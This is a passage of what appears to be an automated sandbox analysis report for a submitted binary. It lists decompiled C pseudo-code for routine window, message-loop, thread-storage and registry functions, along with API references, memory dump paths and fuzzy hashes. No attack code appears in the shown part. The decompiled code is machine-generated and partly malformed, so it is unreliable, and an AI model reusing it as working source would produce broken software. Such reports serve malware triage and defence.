                  • Opcode Fuzzy Hash: 9dd0b80c57cd055b5c3aae39b5d4aa4e3f334b3c2dd04950780753353c1d00f6
                  • Instruction Fuzzy Hash: 5911307650020AFFD7109FA5DC84DAB7BBDFB88710F14852ABD16A3254E730E900CB65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 84%
                  			E0042094A(void* __ecx, long* __edi, void* __esi) {
                  				long _t22;
                  				void* _t23;
                  				void* _t28;
                  				void* _t31;
                  				void* _t33;
                  				signed int _t35;
                  				long* _t40;
                  				void* _t41;
                  				void* _t42;
                  
                  				_t41 = __esi;
                  				_t40 = __edi;
                  				_t31 = __ecx;
                  				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
                  				E00430CF4(0, 0);
                  				_t22 = E004148C1(_t31, 0, __edi[3], 4);
                  				_t33 = 2;
                  				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
                  				_t46 = _t23;
                  				if(_t23 == 0) {
                  					LeaveCriticalSection( *(_t42 - 0x14));
                  					_t23 = E004063FE(0, _t33, __edi, __esi, _t46);
                  				}
                  				 *(_t41 + 0xc) = _t23;
                  				E00431160(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
                  				 *(_t41 + 8) = _t40[3];
                  				TlsSetValue( *_t40, _t41);
                  				_t35 =  *(_t42 + 8);
                  				_t28 =  *(_t41 + 0xc);
                  				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
                  					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
                  				}
                  				_push( *(_t42 - 0x14));
                  				LeaveCriticalSection();
                  				return E00431B73(_t28);
                  			}












                  APIs
                  • LeaveCriticalSection.KERNEL32(?), ref: 00420951
                  • __CxxThrowException@8.LIBCMT ref: 0042095B
                    • Part of subcall function 00430CF4: RaiseException.KERNEL32(?,?,?,?), ref: 00430D36
                  • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 00420972
                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 0042097F
                    • Part of subcall function 004063FE: __CxxThrowException@8.LIBCMT ref: 00406414
                  • _memset.LIBCMT ref: 0042099E
                  • TlsSetValue.KERNEL32(?,00000000,0041F372,00406452,00411FA3), ref: 004209AF
                  • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 004209D0
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                  • String ID:
                  • API String ID: 356813703-0
                  • Opcode ID: af9ad24891c458db921cd8b6e4028670f66e224599244f3ca0a8739f32a8bdb8
                  • Instruction ID: 35073c979330c48db295c3963723042328dd249a9d273a9f0c0c6630b77ded6a
                  • Opcode Fuzzy Hash: af9ad24891c458db921cd8b6e4028670f66e224599244f3ca0a8739f32a8bdb8
                  • Instruction Fuzzy Hash: E2118EB4100606AFEB10AF65DC85D6BBBB9FF44318B10C53EF55696662CB34AC60CF58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E00438A80(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				signed int _t15;
                  				LONG* _t21;
                  				long _t23;
                  				void* _t31;
                  				LONG* _t33;
                  				void* _t34;
                  				void* _t35;
                  
                  				_t35 = __eflags;
                  				_t29 = __edx;
                  				_t25 = __ebx;
                  				_push(0xc);
                  				_push(0x45e210);
                  				E00431818(__ebx, __edi, __esi);
                  				_t31 = E00436178(__ebx, __edx, __edi, _t35);
                  				_t15 =  *0x463b44; // 0xfffffffe
                  				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                  					E0043A0BF(_t25, 0xd);
                  					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                  					_t33 =  *(_t31 + 0x68);
                  					 *(_t34 - 0x1c) = _t33;
                  					__eflags = _t33 -  *0x463a48; // 0x25e1600
                  					if(__eflags != 0) {
                  						__eflags = _t33;
                  						if(_t33 != 0) {
                  							_t23 = InterlockedDecrement(_t33);
                  							__eflags = _t23;
                  							if(_t23 == 0) {
                  								__eflags = _t33 - 0x463620;
                  								if(__eflags != 0) {
                  									_push(_t33);
                  									E004316F6(_t25, _t31, _t33, __eflags);
                  								}
                  							}
                  						}
                  						_t21 =  *0x463a48; // 0x25e1600
                  						 *(_t31 + 0x68) = _t21;
                  						_t33 =  *0x463a48; // 0x25e1600
                  						 *(_t34 - 0x1c) = _t33;
                  						InterlockedIncrement(_t33);
                  					}
                  					 *(_t34 - 4) = 0xfffffffe;
                  					E00438B1B();
                  				} else {
                  					_t33 =  *(_t31 + 0x68);
                  				}
                  				if(_t33 == 0) {
                  					E0043395F(_t29, _t31, 0x20);
                  				}
                  				return E0043185D(_t33);
                  			}










                  APIs
                  • __getptd.LIBCMT ref: 00438A8C
                    • Part of subcall function 00436178: __getptd_noexit.LIBCMT ref: 0043617B
                    • Part of subcall function 00436178: __amsg_exit.LIBCMT ref: 00436188
                  • __amsg_exit.LIBCMT ref: 00438AAC
                  • __lock.LIBCMT ref: 00438ABC
                  • InterlockedDecrement.KERNEL32(?), ref: 00438AD9
                  • InterlockedIncrement.KERNEL32(025E1600), ref: 00438B04
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                  • String ID: 6F
                  • API String ID: 4271482742-3517966882
                  • Opcode ID: 6c584e623dab6ad2db5e4a70b67004d1be87bba4eab4fad9846b8a59ee196114
                  • Instruction ID: 2a7e21e7e983cbed5c811cbe98960c0c60f51e7b7e610d5969f46117a2a2e828
                  • Opcode Fuzzy Hash: 6c584e623dab6ad2db5e4a70b67004d1be87bba4eab4fad9846b8a59ee196114
                  • Instruction Fuzzy Hash: 45018231900722ABC725BF65980574AF760AB08725F14601FF80067792DBBC6A41CBDE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00420379(void* __ecx) {
                  				struct HBRUSH__* _t14;
                  				void* _t18;
                  
                  				_t18 = __ecx;
                  				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
                  				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
                  				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
                  				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
                  				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
                  				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
                  				_t14 = GetSysColorBrush(6);
                  				 *(_t18 + 0x20) = _t14;
                  				return _t14;
                  			}





                  APIs
                  • GetSysColor.USER32(0000000F), ref: 00420387
                  • GetSysColor.USER32(00000010), ref: 0042038E
                  • GetSysColor.USER32(00000014), ref: 00420395
                  • GetSysColor.USER32(00000012), ref: 0042039C
                  • GetSysColor.USER32(00000006), ref: 004203A3
                  • GetSysColorBrush.USER32(0000000F), ref: 004203B0
                  • GetSysColorBrush.USER32(00000006), ref: 004203B7
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Color$Brush
                  • String ID:
                  • API String ID: 2798902688-0
                  • Opcode ID: bbd7f8a36c46f4b64160d0f99ed0faba5aa863649304fb25e67fbe5355e6cc7b
                  • Instruction ID: 65459e24616037a58442e39c341cc04108a4acc29dfa35b8cf1959434db4eedb
                  • Opcode Fuzzy Hash: bbd7f8a36c46f4b64160d0f99ed0faba5aa863649304fb25e67fbe5355e6cc7b
                  • Instruction Fuzzy Hash: 2BF0FE719407445BD730BB735D09B47BAD1FFC4710F02092AD2458B990D6B5E441DF44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004131F2(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr* _t78;
                  				void* _t79;
                  				void* _t80;
                  
                  				_t80 = __eflags;
                  				E00431A9B(E0044BF26, __ebx, __edi, __esi);
                  				_t78 = __ecx;
                  				E00422EAE(__ebx, _t79 - 0x40, __edi, __ecx, _t80);
                  				 *(_t79 - 4) =  *(_t79 - 4) & 0x00000000;
                  				GetClientRect( *(_t78 + 0x20), _t79 - 0x2c);
                  				GetWindowRect( *(_t78 + 0x20), _t79 - 0x1c);
                  				E00422BFB(_t78, _t79 - 0x1c);
                  				OffsetRect(_t79 - 0x2c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
                  				E00422646(_t79 - 0x40, _t79 - 0x2c);
                  				OffsetRect(_t79 - 0x1c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
                  				 *((intOrPtr*)( *_t78 + 0x150))(_t79 - 0x40, _t79 - 0x1c, __ecx, 0x34);
                  				E0042268D(_t79 - 0x40, _t79 - 0x1c);
                  				SendMessageA( *(_t78 + 0x20), 0x14,  *(_t79 - 0x3c), 0);
                  				 *((intOrPtr*)( *_t78 + 0x158))(_t79 - 0x40, _t79 - 0x1c);
                  				 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
                  				return E00431B73(E00422F02(__ebx, _t79 - 0x40, OffsetRect, _t78,  *(_t79 - 4)));
                  			}






                  APIs
                  • __EH_prolog3.LIBCMT ref: 00421612
                    • Part of subcall function 00422EAE: __EH_prolog3.LIBCMT ref: 00422EB5
                    • Part of subcall function 00422EAE: GetWindowDC.USER32(00000000,00000004,00419EC3,00000000,00000018,00418677,00000001,?,?,004527FC,004527FC), ref: 00422EE1
                  • GetClientRect.USER32 ref: 0042162D
                  • GetWindowRect.USER32 ref: 0042163A
                    • Part of subcall function 00422BFB: ScreenToClient.USER32 ref: 00422C0C
                    • Part of subcall function 00422BFB: ScreenToClient.USER32 ref: 00422C19
                  • OffsetRect.USER32(?,?,?), ref: 00421661
                    • Part of subcall function 00422646: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0042266F
                    • Part of subcall function 00422646: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 00422684
                  • OffsetRect.USER32(?,?,?), ref: 0042167F
                    • Part of subcall function 0042268D: IntersectClipRect.GDI32(?,?,?,?,?), ref: 004226B6
                    • Part of subcall function 0042268D: IntersectClipRect.GDI32(?,?,?,?,?), ref: 004226CB
                  • SendMessageA.USER32(?,00000014,?,00000000), ref: 004216A9
                    • Part of subcall function 00422F02: __EH_prolog3.LIBCMT ref: 00422F09
                    • Part of subcall function 00422F02: ReleaseDC.USER32 ref: 00422F26
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Clip$ClientH_prolog3$ExcludeIntersectOffsetScreenWindow$MessageReleaseSend
                  • String ID:
                  • API String ID: 2952362992-0
                  • Opcode ID: 4d7821c7f4b74c1374008cb86f107091761dbfdb9a1f2cd9f1ce72ed74d0e9cc
                  • Instruction ID: 54d9f2b2cb95faf2a6f24e4230d7989ba867047feb8828be0b4a30da0d48dd3d
                  • Opcode Fuzzy Hash: 4d7821c7f4b74c1374008cb86f107091761dbfdb9a1f2cd9f1ce72ed74d0e9cc
                  • Instruction Fuzzy Hash: 65210A7291001AEFDB15EBA4DC95DFEB7B8FF18305F40411AF152A71A0EB646A06CB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00416EE5(struct HWND__* _a4, struct HWND__** _a8) {
                  				struct HWND__* _t8;
                  				void* _t14;
                  				struct HWND__** _t16;
                  				struct HWND__* _t17;
                  				struct HWND__* _t18;
                  
                  				_t18 = _a4;
                  				if(_t18 != 0) {
                  					L5:
                  					if((GetWindowLongA(_t18, 0xfffffff0) & 0x40000000) == 0) {
                  						L8:
                  						_t17 = _t18;
                  						_t8 = _t18;
                  						if(_t18 == 0) {
                  							L10:
                  							if(_a4 == 0 && _t18 != 0) {
                  								_t18 = GetLastActivePopup(_t18);
                  							}
                  							_t16 = _a8;
                  							if(_t16 != 0) {
                  								if(_t17 == 0 || IsWindowEnabled(_t17) == 0 || _t17 == _t18) {
                  									 *_t16 =  *_t16 & 0x00000000;
                  								} else {
                  									 *_t16 = _t17;
                  									EnableWindow(_t17, 0);
                  								}
                  							}
                  							return _t18;
                  						} else {
                  							goto L9;
                  						}
                  						do {
                  							L9:
                  							_t17 = _t8;
                  							_t8 = GetParent(_t8);
                  						} while (_t8 != 0);
                  						goto L10;
                  					}
                  					_t18 = GetParent(_t18);
                  					L7:
                  					if(_t18 != 0) {
                  						goto L5;
                  					}
                  					goto L8;
                  				}
                  				_t14 = E00416EA0();
                  				if(_t14 != 0) {
                  					L4:
                  					_t18 =  *(_t14 + 0x20);
                  					goto L7;
                  				}
                  				_t14 = E00403AA0();
                  				if(_t14 != 0) {
                  					goto L4;
                  				}
                  				_t18 = 0;
                  				goto L8;
                  			}








                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                  • String ID:
                  • API String ID: 670545878-0
                  • Opcode ID: 13871ef3759c618d8f268107ebfde00254af1969d96d9b07d1e74764d8d3a6e7
                  • Instruction ID: 9e4f7b4cd4cbdf7f40bd5940dfb5179cf4edfd5842048a0ac895ae762c2329d2
                  • Opcode Fuzzy Hash: 13871ef3759c618d8f268107ebfde00254af1969d96d9b07d1e74764d8d3a6e7
                  • Instruction Fuzzy Hash: BC1194366052316BDB311B6AAD447AB66A86F55B60F17012BED04A7344DB38CC838ADD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 92%
                  			E0040819E(intOrPtr __ecx, intOrPtr _a4) {
                  				intOrPtr _v8;
                  				void* __edi;
                  				void* __esi;
                  				struct HWND__* _t17;
                  				signed int _t22;
                  				struct HWND__* _t32;
                  				void* _t34;
                  
                  				_t30 = __ecx;
                  				_push(__ecx);
                  				_v8 = __ecx;
                  				_t17 = GetWindow(GetDesktopWindow(), 5);
                  				_t32 = _t17;
                  				_t36 = _t32;
                  				if(_t32 == 0) {
                  					L14:
                  					return _t17;
                  				} else {
                  					_push(_t34);
                  					do {
                  						_t34 = E0040EE68(_t30, _t32, _t34, _t36, _t32);
                  						if(_t34 != 0) {
                  							_t20 =  *((intOrPtr*)(_v8 + 0x20));
                  							if( *((intOrPtr*)(_v8 + 0x20)) != _t32 && E00408105(_t20, _t32) != 0) {
                  								_t22 = GetWindowLongA(_t32, 0xfffffff0);
                  								if(_a4 != 0) {
                  									__eflags = _t22 & 0x18000000;
                  									if(__eflags == 0) {
                  										__eflags =  *(_t34 + 0x3c) & 0x00000002;
                  										if(__eflags != 0) {
                  											__eflags =  *(_v8 + 0xb4);
                  											if(__eflags == 0) {
                  												ShowWindow(_t32, 4);
                  												_t14 = _t34 + 0x3c;
                  												 *_t14 =  *(_t34 + 0x3c) & 0xfffffffd;
                  												__eflags =  *_t14;
                  											}
                  										}
                  									}
                  								} else {
                  									if((_t22 & 0x18000000) == 0x10000000) {
                  										ShowWindow(_t32, 0);
                  										 *(_t34 + 0x3c) =  *(_t34 + 0x3c) | 0x00000002;
                  									}
                  								}
                  							}
                  						}
                  						_t17 = GetWindow(_t32, 2);
                  						_t32 = _t17;
                  					} while (_t32 != 0);
                  					goto L14;
                  				}
                  			}

                  APIs
                  • GetDesktopWindow.USER32 ref: 004081AA
                  • GetWindow.USER32(00000000), ref: 004081B1
                  • GetWindowLongA.USER32 ref: 004081ED
                  • ShowWindow.USER32(00000000,00000000), ref: 00408208
                  • ShowWindow.USER32(00000000,00000004), ref: 0040822C
                  • GetWindow.USER32(00000000,00000002), ref: 00408235
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Show$DesktopLong
                  • String ID:
                  • API String ID: 3178490500-0
                  • Opcode ID: 2adaebdcccac595bc1267bf586bd64cc53134c589bb79a51c25d8a8f8971210c
                  • Instruction ID: 421dcce19a151290b000e9d638100705882381d2d218f3d77e8fe81ceb2f36eb
                  • Opcode Fuzzy Hash: 2adaebdcccac595bc1267bf586bd64cc53134c589bb79a51c25d8a8f8971210c
                  • Instruction Fuzzy Hash: 0B110431440A04AFD721C7258E89F2F36B5EB917A5FA105BEF881B62C4CF3CDC018A19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 72%
                  			E004252FF(void* __ecx) {
                  				struct tagMSG _v32;
                  				void* __ebx;
                  				int _t20;
                  				intOrPtr _t23;
                  				int _t30;
                  				intOrPtr _t31;
                  				void* _t32;
                  				void* _t33;
                  				void* _t36;
                  				void* _t38;
                  
                  				_t32 = PeekMessageA;
                  				_t38 = __ecx;
                  				while(PeekMessageA( &_v32, 0, 0xf, 0xf, 0) != 0) {
                  					_t20 = GetMessageA( &_v32, 0, 0xf, 0xf);
                  					if(_t20 != 0) {
                  						DispatchMessageA( &_v32);
                  						continue;
                  					}
                  					return _t20;
                  				}
                  				_t23 =  *((intOrPtr*)(_t38 + 0x68));
                  				 *((intOrPtr*)(_t38 + 0x70)) =  *((intOrPtr*)(_t23 + 0x88));
                  				 *(_t38 + 0x78) =  *(_t23 + 0x84) & 0x0000f000;
                  				SetRectEmpty(_t38 + 0xc);
                  				 *((intOrPtr*)(_t38 + 0x20)) = 0;
                  				 *((intOrPtr*)(_t38 + 0x1c)) = 0;
                  				 *((intOrPtr*)(_t38 + 0x24)) = 0;
                  				 *((intOrPtr*)(_t38 + 0x7c)) = 0;
                  				 *((intOrPtr*)(_t38 + 0x80)) = 0;
                  				_t33 = E0040EE3C(_t32,  *((intOrPtr*)(_t23 + 0x88)), GetDesktopWindow());
                  				_t30 = LockWindowUpdate( *(_t33 + 0x20));
                  				_t36 = _t33;
                  				if(_t30 == 0) {
                  					_push(3);
                  				} else {
                  					_push(0x403);
                  				}
                  				_push(0);
                  				_t31 = E00425132(_t36);
                  				 *((intOrPtr*)(_t38 + 0x84)) = _t31;
                  				return _t31;
                  			}

                  APIs
                  • GetMessageA.USER32 ref: 0042531F
                  • DispatchMessageA.USER32 ref: 00425331
                  • PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 00425341
                  • SetRectEmpty.USER32(?), ref: 00425365
                  • GetDesktopWindow.USER32 ref: 0042537D
                  • LockWindowUpdate.USER32(?,00000000), ref: 0042538E
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                  • String ID:
                  • API String ID: 1192691108-0
                  • Opcode ID: aace2d7f96b7781ae3f89cd1ea8af059833168b570cc0a46978888ca4ec1f2a3
                  • Instruction ID: 49a96046c5d33274eb4831c9af67dae449dda2e98a187f2c04bc5722c74187fb
                  • Opcode Fuzzy Hash: aace2d7f96b7781ae3f89cd1ea8af059833168b570cc0a46978888ca4ec1f2a3
                  • Instruction Fuzzy Hash: CB117F76A00B01ABD720DFA6DC48B67BBFCBB44740F40443AE696D76A1EB74D4019B18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 63%
                  			E0040B025(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t28;
                  				long _t31;
                  				void* _t33;
                  				void* _t38;
                  				void* _t58;
                  				void* _t59;
                  
                  				_t52 = __edx;
                  				_push(0x18);
                  				E00431ACE(E0044AEBE, __ebx, __edi, __esi);
                  				 *((intOrPtr*)(_t59 - 0x1c)) = __ecx;
                  				_push(_t59 - 0x18);
                  				_push(_t59 - 0x20);
                  				_push( *((intOrPtr*)(_t59 + 0xc)));
                  				_push(0x3e8);
                  				L00447488();
                  				_t28 = GlobalLock( *(_t59 - 0x18));
                  				E004014C0(_t59 - 0x14, _t52);
                  				 *(_t59 - 4) =  *(_t59 - 4) & 0x00000000;
                  				 *(_t59 - 4) = 1;
                  				E00402830(_t52, __edi, _t28);
                  				_t31 = GlobalUnlock( *(_t59 - 0x18));
                  				 *(_t59 - 4) =  *(_t59 - 4) & 0x00000000;
                  				_push( *(_t59 - 0x18));
                  				_push(0x8000);
                  				_push(0x3e4);
                  				_push(0x3e8);
                  				_push( *((intOrPtr*)(_t59 + 0xc)));
                  				L00447482();
                  				_t54 =  *((intOrPtr*)(_t59 - 0x1c));
                  				PostMessageA( *(_t59 + 8), 0x3e4,  *( *((intOrPtr*)(_t59 - 0x1c)) + 0x20), _t31);
                  				_t33 = E00412C5B( *((intOrPtr*)(_t59 - 0x1c)));
                  				_t61 = _t33;
                  				if(_t33 != 0) {
                  					_t58 = E0040A688(_t59 - 0x14);
                  					_t38 = E0041F363(__ebx, _t54, _t58, _t61);
                  					_t52 =  *((intOrPtr*)( *((intOrPtr*)(_t38 + 4))));
                  					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t38 + 4)))) + 0xa0))(_t58);
                  					E0040A356(_t59 - 0x14, 0xffffffff);
                  				}
                  				E004010B0( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
                  				return E00431B73(0);
                  			}

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 0040B02C
                  • UnpackDDElParam.USER32(000003E8,?,?,?), ref: 0040B044
                  • GlobalLock.KERNEL32 ref: 0040B04C
                  • GlobalUnlock.KERNEL32(?,00000000), ref: 0040B070
                  • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 0040B090
                  • PostMessageA.USER32 ref: 0040B0A0
                    • Part of subcall function 00412C5B: IsWindowEnabled.USER32(?), ref: 00412C64
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: GlobalParam$EnabledH_prolog3_catchLockMessagePostReuseUnlockUnpackWindow
                  • String ID:
                  • API String ID: 4187826474-0
                  • Opcode ID: 7712ed31451a7ab43eb35c33b2217e765a9a71d402a23eff9c4a25d2ad28ad7d
                  • Instruction ID: 9d41415674a00b450912fe41e8faaea42a91231a293c7cca4ef03f372c888be7
                  • Opcode Fuzzy Hash: 7712ed31451a7ab43eb35c33b2217e765a9a71d402a23eff9c4a25d2ad28ad7d
                  • Instruction Fuzzy Hash: 8911A235900109AFDF01EBA1CD46AFE7B74BF04315F14422AB515B72E1DB389A15CBA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00426668(intOrPtr __ecx, CHAR* _a4, char* _a8, char* _a12) {
                  				long _t21;
                  				void* _t28;
                  
                  				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
                  					return WritePrivateProfileStringA(_a4, _a8, _a12,  *(__ecx + 0x68));
                  				}
                  				if(_a8 != 0) {
                  					_t28 = E0042652C(__ecx, _a4);
                  					if(_a12 != 0) {
                  						if(_t28 == 0) {
                  							L3:
                  							return 0;
                  						}
                  						_t21 = RegSetValueExA(_t28, _a8, 0, 1, _a12, lstrlenA(_a12) + 1);
                  						L10:
                  						RegCloseKey(_t28);
                  						return 0 | _t21 == 0x00000000;
                  					}
                  					if(_t28 == 0) {
                  						goto L3;
                  					}
                  					_t21 = RegDeleteValueA(_t28, _a8);
                  					goto L10;
                  				}
                  				_t28 = E00426499(__ecx);
                  				if(_t28 != 0) {
                  					_t21 = RegDeleteKeyA(_t28, _a4);
                  					goto L10;
                  				}
                  				goto L3;
                  			}

                  APIs
                  • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 0042668E
                  • RegDeleteValueA.ADVAPI32(00000000,00000000), ref: 004266AE
                  • RegCloseKey.ADVAPI32(00000000), ref: 004266D9
                    • Part of subcall function 00426499: RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 004264C9
                    • Part of subcall function 00426499: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 004264EC
                    • Part of subcall function 00426499: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00426508
                    • Part of subcall function 00426499: RegCloseKey.ADVAPI32(?), ref: 00426518
                    • Part of subcall function 00426499: RegCloseKey.ADVAPI32(?), ref: 00426522
                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 004266F4
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
                  • String ID:
                  • API String ID: 1886894508-0
                  • Opcode ID: cf54b3c77ee718f75f42add01bc63d46b6446b20ccf5db03060ca3b177b08ec9
                  • Instruction ID: 89b66a75d349d0838efd71de6006c1518052202ea5fbcc01f482d7d6114c7717
                  • Opcode Fuzzy Hash: cf54b3c77ee718f75f42add01bc63d46b6446b20ccf5db03060ca3b177b08ec9
                  • Instruction Fuzzy Hash: F011A036601235FBCF221F61EC08BAE3B65BF04355F564426FD1599120CBBAC811DB9C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 023EA857
                  Strings
